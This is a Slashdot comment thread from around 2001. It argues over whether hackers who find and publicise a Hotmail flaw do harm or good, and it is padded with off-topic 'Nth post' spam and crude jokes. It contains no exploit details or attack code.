I'm so glad they found this flaw (one which from the reading isn't all that new) as now we know that our hotmail can be read by anyone - how? well the kind hearted uber skilled hackers didn't just post this to MS did they? naaah they posted it everywhere - it's the talk of IRC etc etc.

I'm so glad hackers keep 'finding' things, like credit card numbers, ways into banking systems, viruses like code red - makes me feel warm and fuzzy.

My question - not to be a troll - is this (and this does not just relate to MS products but I'm asking a serious question)

if this security flaw had not been found (by these guys looking for a way to break into hotmail to read people's mail) would anyone have been affected? i mean if the flaw had to be looked for with careful thought etc then was it a real serious issue BEFORE these guys told everyone?

networks can have flaws and holes, open ports etc left active by a careless admin - not the best i know but big systems have a lot of work and these days we are coping with less staff (i know my company is) so sometimes things slip through.

But these guys go and look for the exploit (i mean what other reason would you have to search for this exploit BUT to be able to hack in and read mail?) and then why tell everyone?

These things need to be fixed i agree but if no one would know they were there except for some kindly souls seeking them out then how much of an issue are they? Are we just accepting that hackers are a good thing cause they find these problems? what will you think when they 'find' that flaw in the company which has your credit card number?

when? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199933)

where?

i smoked all you fewls! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199934)

220000th, you can't front on that!

fuck you 220000th post posers, i win!

you can't mess with me! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199942)

my 220000th posting skills are too leet for all ya'lls.

Crackers? (1)

thufir (129668) | more than 12 years ago | (#2199945)

I used to love crackers! They are a great little snack in between meals: good with cheese or jam, and not too filling.

And now they betray me, reading my personal email? Damn them!

Hackers on the other hand, I keep an eye on. Some can be good, and some can be bad (or both).

First Heidi Wall post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199947)

oops... sorry..

RMS (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199949)

Richard Stallman says: 220000th post!

"Limited Scope" (3, Insightful)

CMiYC (6473) | more than 12 years ago | (#2199952)

Why does the media try to convince people that a "fast internet connection" is a limiting factor? It seems to me that many of the people who are script kiddies, or l33 d00z, or whatever, are people who have some form of broadband. That's like saying "well cars are only dangerous if you drive a Porsche."

Less than 1/2 string readable (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199957)

ABSOLUTELY NO READABLE CONTENT on this topic. Nothing, nada, just 2200000 assholes trying to get 2200000 posts written in 2 minutes.

Slashdot, your feet stink!

Approaching... (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199958)

post number #2200000!

testing. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199963)

testin [goatse.cx] g slash2.2 [microsoft.com]

So what? (1)

HillBilly (120575) | more than 12 years ago | (#2199966)

Someone gets to read my spam. Maybe they will have better luck making their dick 4 inches longer than I did.